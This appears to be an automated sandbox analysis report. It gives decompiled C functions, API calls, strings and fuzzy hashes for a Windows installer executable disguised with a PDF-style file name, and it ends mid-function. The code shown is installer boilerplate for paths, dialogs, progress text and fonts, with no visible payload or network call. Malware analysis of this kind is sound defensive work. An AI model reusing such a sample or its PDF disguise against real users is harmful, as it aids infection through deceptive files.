                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                      • API String ID: 222337774-899692902
                                                                      • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                                      • Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
                                                                      • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                                      • Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004064A6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E004064A6(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405C3D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405BF3(L"*?|<>/\":", _t5))) == 0) {
							E00405DA2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                      0x004064a8
                                                                      0x004064b1
                                                                      0x004064c8
                                                                      0x004064c8
                                                                      0x004064cf
                                                                      0x004064db
                                                                      0x004064db
                                                                      0x004064de
                                                                      0x004064e1
                                                                      0x004064e6
                                                                      0x004064e8
                                                                      0x004064f1
                                                                      0x004064f5
                                                                      0x00406512
                                                                      0x0040651a
                                                                      0x0040651a
                                                                      0x0040651f
                                                                      0x00406521
                                                                      0x00406524
                                                                      0x00406529
                                                                      0x0040652a
                                                                      0x0040652e
                                                                      0x0040652e
                                                                      0x0040652f
                                                                      0x00406536
                                                                      0x00406538
                                                                      0x0040653f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406547
                                                                      0x0040654d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040654d
                                                                      0x00406552

                                                                      APIs
                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76A63420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                                      • CharNextW.USER32(?,00000000,76A63420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                                      • CharPrevW.USER32(?,?,76A63420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                                      Strings
                                                                      • *?|<>/":, xrefs: 004064F8
                                                                      • "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe", xrefs: 004064A6
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004064A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-2828118500
                                                                      • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                                      • Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
                                                                      • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                                      • Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040433D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040433D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                      0x0040434f
                                                                      0x004043e3
                                                                      0x00000000
                                                                      0x004043e3
                                                                      0x00404360
                                                                      0x00404364
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040436a
                                                                      0x00404373
                                                                      0x00404376
                                                                      0x00404376
                                                                      0x0040437c
                                                                      0x00404382
                                                                      0x00404382
                                                                      0x0040438e
                                                                      0x00404394
                                                                      0x0040439b
                                                                      0x0040439e
                                                                      0x004043a1
                                                                      0x004043a3
                                                                      0x004043a3
                                                                      0x004043ab
                                                                      0x004043b1
                                                                      0x004043b1
                                                                      0x004043bb
                                                                      0x004043c0
                                                                      0x004043c3
                                                                      0x004043c8
                                                                      0x004043cb
                                                                      0x004043cb
                                                                      0x004043db
                                                                      0x004043db
                                                                      0x00000000

                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040435A
                                                                      • GetSysColor.USER32(00000000), ref: 00404376
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404382
                                                                      • SetBkMode.GDI32(?,?), ref: 0040438E
                                                                      • GetSysColor.USER32(?), ref: 004043A1
                                                                      • SetBkColor.GDI32(?,?), ref: 004043B1
                                                                      • DeleteObject.GDI32(?), ref: 004043CB
                                                                      • CreateBrushIndirect.GDI32(?), ref: 004043D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                      • Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
                                                                      • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                      • Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402E33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00402E33(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x418edc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x418edc = 0;
					return _t15;
				}
				__eflags =  *0x418edc; // 0x0
				if(__eflags != 0) {
					return E00406628(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a24c;
				if(_t6 >  *0x42a24c) {
					__eflags =  *0x42a248;
					if( *0x42a248 == 0) {
						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402D98, 0);
						 *0x418edc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a2f4 & 0x00000001;
					if(( *0x42a2f4 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402E17());
						return E00405371(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                      0x00402e42
                                                                      0x00402e44
                                                                      0x00402e4b
                                                                      0x00402e4e
                                                                      0x00402e4e
                                                                      0x00402e54
                                                                      0x00000000
                                                                      0x00402e54
                                                                      0x00402e5c
                                                                      0x00402e62
                                                                      0x00000000
                                                                      0x00402e65
                                                                      0x00402e6c
                                                                      0x00402e72
                                                                      0x00402e78
                                                                      0x00402e7a
                                                                      0x00402e80
                                                                      0x00402ebe
                                                                      0x00402ec7
                                                                      0x00000000
                                                                      0x00402ecc
                                                                      0x00402e82
                                                                      0x00402e89
                                                                      0x00402e9a
                                                                      0x00000000
                                                                      0x00402ea8
                                                                      0x00402e89
                                                                      0x00402ed4

                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
                                                                      • GetTickCount.KERNEL32 ref: 00402E6C
                                                                      • wsprintfW.USER32 ref: 00402E9A
                                                                        • Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                        • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                        • Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00402EAD), ref: 004053CC
                                                                        • Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll), ref: 004053DE
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
                                                                        • Part of subcall function 00402E17: MulDiv.KERNEL32(00039B2B,00000064,0003C883), ref: 00402E2C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 722711167-2449383134
                                                                      • Opcode ID: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
                                                                      • Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
                                                                      • Opcode Fuzzy Hash: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
                                                                      • Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404C3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00404C3B(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                      0x00404c49
                                                                      0x00404c56
                                                                      0x00404c5c
                                                                      0x00404c9a
                                                                      0x00404c9a
                                                                      0x00404ca9
                                                                      0x00404cb0
                                                                      0x00000000
                                                                      0x00404cb2
                                                                      0x00404c5e
                                                                      0x00404c6d
                                                                      0x00404c75
                                                                      0x00404c78
                                                                      0x00404c8a
                                                                      0x00404c90
                                                                      0x00404c97
                                                                      0x00000000
                                                                      0x00404c97
                                                                      0x00000000

                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
                                                                      • GetMessagePos.USER32 ref: 00404C5E
                                                                      • ScreenToClient.USER32(?,?), ref: 00404C78
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                      • Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
                                                                      • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                      • Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 73%
                                                                      			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C31(2);
				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
				0x40cde0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdf0 = E00402C31(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
				 *0x40cdf7 = 1;
				 *0x40cdf4 = _t15 & 0x00000001;
				 *0x40cdf5 = _t15 & 0x00000002;
				 *0x40cdf6 = _t15 & 0x00000004;
				E00406234(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cde0);
				_push(_t18);
				_push(_t33);
				E00406159();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                      0x00401db3
                                                                      0x00401dbe
                                                                      0x00401dc0
                                                                      0x00401dcd
                                                                      0x00401de4
                                                                      0x00401de9
                                                                      0x00401df6
                                                                      0x00401dfb
                                                                      0x00401dff
                                                                      0x00401e0a
                                                                      0x00401e11
                                                                      0x00401e23
                                                                      0x00401e29
                                                                      0x00401e2e
                                                                      0x00401e38
                                                                      0x004025a8
                                                                      0x0040156d
                                                                      0x00402a81
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401DB6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                      • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID: Calibri
                                                                      • API String ID: 3808545654-1409258342
                                                                      • Opcode ID: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
                                                                      • Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
                                                                      • Opcode Fuzzy Hash: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
                                                                      • Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402D98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00402D98(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, "true", 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E17();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a250 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                      0x00402da8
                                                                      0x00402db6
                                                                      0x00402dbc
                                                                      0x00402dbc
                                                                      0x00402dca
                                                                      0x00402dcc
                                                                      0x00402dd8
                                                                      0x00402ddd
                                                                      0x00402ddf
                                                                      0x00402ddf
                                                                      0x00402dea
                                                                      0x00402dfa
                                                                      0x00402e0c
                                                                      0x00402e0c
                                                                      0x00402e14

                                                                      APIs
                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DB6
                                                                      • wsprintfW.USER32 ref: 00402DEA
                                                                      • SetWindowTextW.USER32(?,?), ref: 00402DFA
                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                      • API String ID: 1451636040-1158693248
                                                                      • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                                      • Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
                                                                      • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                                      • Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E100022D0(void* __edx) {
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t42;
				signed int* _t43;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t42 = 0x1a;
					if(_t52 == _t42) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t42;
							goto L12;
						} else {
							_t38 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t38 = E10001243();
						L11:
						_t52 = _t38;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t43 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t39 =  *_t51;
						_t51[7] = _t51[7] & 0x00000000;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t52);
